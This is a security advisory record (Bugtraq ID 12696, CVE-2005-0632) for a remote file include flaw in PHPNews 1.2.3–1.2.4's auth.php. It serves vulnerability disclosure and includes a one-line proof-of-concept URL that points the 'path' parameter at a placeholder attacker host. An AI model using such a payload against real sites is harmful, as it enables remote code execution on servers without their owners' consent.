BID:12696

PHPNews Auth.PHP Remote File Include Vulnerability

Info

PHPNews Auth.PHP Remote File Include Vulnerability

Bugtraq ID:	12696
Class:	Input Validation Error
CVE:	CVE-2005-0632
Remote:	Yes
Local:	No
Published:	Mar 01 2005 12:00AM
Updated:	Jul 12 2009 10:56AM
Credit:	Discovery of this vulnerability is credited to Filip Groszynski <[email protected]>.
Vulnerable:	PHPNews PHPNews 1.2.4 PHPNews PHPNews 1.2.3

Not Vulnerable:

Discussion

PHPNews Auth.PHP Remote File Include Vulnerability

It is reported that PHPNews is affected by a remote PHP file include vulnerability. This issue is due in part to the application failing to properly sanitize user-supplied input.

This issue reportedly affects PHPNews version 1.2.4, previous versions might also be affected.

Exploit / POC

PHPNews Auth.PHP Remote File Include Vulnerability

The following examples are available:

http://www.example.com/[dir]/auth.php?path=http://[hacker_box]/

/data/vulnerabilities/exploits/phpN.py

Solution / Fix

PHPNews Auth.PHP Remote File Include Vulnerability

Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.

References

PHPNews Auth.PHP Remote File Include Vulnerability

References:

PHPNews Home Page (PHPNews)
Multiple CMS/Forum Vulnablilties (pacifico)
PHP News <= 1.2.4 - Remote File Inclusion (VXSfx) (Filip Groszynski )